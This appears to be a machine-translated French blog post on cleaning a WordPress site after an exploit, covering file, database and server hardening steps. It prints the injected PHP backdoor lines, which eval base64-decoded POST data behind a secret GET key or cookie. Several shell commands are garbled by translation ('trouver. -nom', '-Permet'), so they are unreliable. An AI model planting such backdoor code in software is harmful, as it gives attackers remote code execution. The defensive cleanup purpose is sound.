Avant de lire ce post, vous devriez voir poster ici, Pour comprendre quelque chose. :)
Je l'ai trouvé dans plusieurs fichiers de blog sur stealthsettings.com, codes similaires à ceux indiqués ci-dessous suite à une infection virale l'exploit de WordPress.:
<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file'])); sortie; }?>
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); sortie; }?>
Dans le cas ci-dessus est sur le fichier xmlrpc.php à partir de SomnolentMais à un grep serveur, ressemble pas mal de codes de ce genre dans les sources.
Nettoyage des fichiers infectés:
Ooookkkk ...
1. La meilleure solution, après avoir fait sauvegardeCPC et base de données nettoyée est de essuyer fichiers WordPress (vous pouvez conserver wp-config.php et les fichiers qui ne sont pas strictement liés à la plate-forme wp, après avoir été soigneusement vérifiés) sur le serveur et télécharger les originaux de la version 2.5.1 (A cette occasion, faire une version mise à jour wp :)) http://wordpress.org/download/ . Supprimer les fichiers dont le thème, si vous avez confiance que vous pouvez les vérifier attentivement.
Il est évident que les fichiers ont été touchés et les thèmes qui ne sont pas utilisés avant sur le blog et changeant simplement le thème, ne résolvent pas ce problème.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file'])); sortie; }?>
2. Rechercher et supprimer tous les fichiers contenant: * _new.php, _old.php * * .jpgg, .giff * * .pngg et le fichier wp-info.txt, le cas échéant.
trouver. -nom "* _new.php"
trouver. -nom "* _old.php"
trouver. -nom «* .jpgg»
trouver. -nom "* _giff"
trouver. -nom "* _pngg"
trouver. -name "wp-info.txt"
3. dans / Tmp , Rechercher et supprimer des dossiers comme tmpYwbzT2
nettoyage SQL :
1. dans le tableau de la table wp_options voir s'il effacer les lignes: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Tout en wp_options, aller à active_plugins et essuyez s'il y a un plugin qui se termine dans l'une des extensions * _new.php, _old.php * * .jpgg, .giff * * .pngg ou si un autre suspect d'extension, vérifiez soigneusement.
3. table wp_users, Voir s'il y a un utilisateur qui n'a rien écrit dans son droit, la colonne user_nicename. Supprimez cet utilisateur, mais souvenez-vous du numéro dans la colonne ID. Cet utilisateur est susceptible d'utiliser "WordPress"Californie USER_LOGIN Il est créé et apparaît sur 00: 00: 00 0000-00-00.
4. Allez à la table wp_usermeta et supprimer toutes les lignes appartenant ID ci-dessus.
Après avoir effectué ce nettoyage SQL, désactivez puis activez n'importe quel plugin. (dans le blog -> Dashboard -> Plugins)
serveur sécurisé:
1. Voir ce que les répertoires et les fichiers sont "écriture"(chmod 777) et essayez de mettre un chmod qui ne permettra plus leur écriture à aucun niveau. (chmod 644, par exemple)
trouver. -Permet -2 -ls
2. Voir quels fichiers ont le bit mis suid ou sgid . Si vous ne l'utilisez ces fichiers placent sur eux chmod 0 ou en désinstallant le paquet qu'il contient. Ils sont très dangereux parce qu'ils exécutent des privilèges "groupe"Ou"racine"Et pas avec des privilèges normaux de l'utilisateur exécutant le fichier.
find / -type f -ls -Permet -04000
find / -type f -ls -Permet -02000
3. Vérifiez quels ports sont ouverts et essayer de fermer ou de sécuriser ceux qui ne sont pas utilisés.
netstat -an | grep -i écouter
Tellement. Je vois Certains blogs sont interdits Google Search et d'autres disent "Bien fait pour eux !!!". Bien bien, je l'ai fait ... mais vous savez si google commence à interdire Nouveau formation SE sPAM tuck Trojans (Trojan.Clicker.HTML) dans les cookies?
1 réflexion sur “WordPress Exploit - Nettoyez les fichiers de virus, SQL et la sécurité du serveur. ”